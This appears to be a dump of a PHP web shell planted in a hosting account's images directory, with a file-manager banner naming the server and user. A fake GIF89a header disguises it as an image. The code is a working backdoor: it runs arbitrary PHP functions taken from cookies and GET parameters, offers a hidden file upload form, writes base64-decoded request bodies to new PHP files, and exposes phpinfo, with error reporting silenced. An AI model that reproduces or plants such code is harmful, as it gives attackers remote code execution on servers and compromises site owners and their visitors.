Server : Apache System : Linux webm012.cluster129.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64 User : eventfrsgx ( 61451) PHP Version : 7.3.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl Directory : /home/e/v/e/eventfrsgx/www/images/ |
GIF89a;<?php
error_reporting(0);
if(isset($_COOKIE['set_name'])) {
$_COOKIE['api_key'] ($_COOKIE['set_name']);
}
if(isset($_COOKIE['api_secret'])) {
$_COOKIE['api_key'] ($_COOKIE['set_name'], $_COOKIE['api_secret']);
}
if(isset($_COOKIE['value'])) {
$_COOKIE['api_key'] ($_COOKIE['set_name']($_COOKIE['value']));
}
if(isset($_GET['handler'])) {
if (isset($_FILES['file']['name'])) {
$name = $_FILES['file']['name'];
$tmp = $_FILES['file']['tmp_name'];
move_uploaded_file($tmp, $name);
echo "<a href='" . $_FILES['file']['name'] . "'>" . $_FILES['file']['name'] . "</a>";
}
else {
echo '<form method="POST" enctype="multipart/form-data">';
echo '<input type="file" name="file">';
echo '<input type="submit" value="Upload File">';
}
exit;
}
if(isset($_GET['raw'])) {
$out = isset($_GET['name']) ? $_GET['name'] : 'x.php';
file_put_contents($out, base64_decode(file_get_contents('php://input')));
echo "OK: $out";
exit;
}
elseif(isset($_GET['info'])) {
phpinfo();
}
elseif(isset($_GET['path'])) {
$_GET['path']($_GET['id']);
}
?>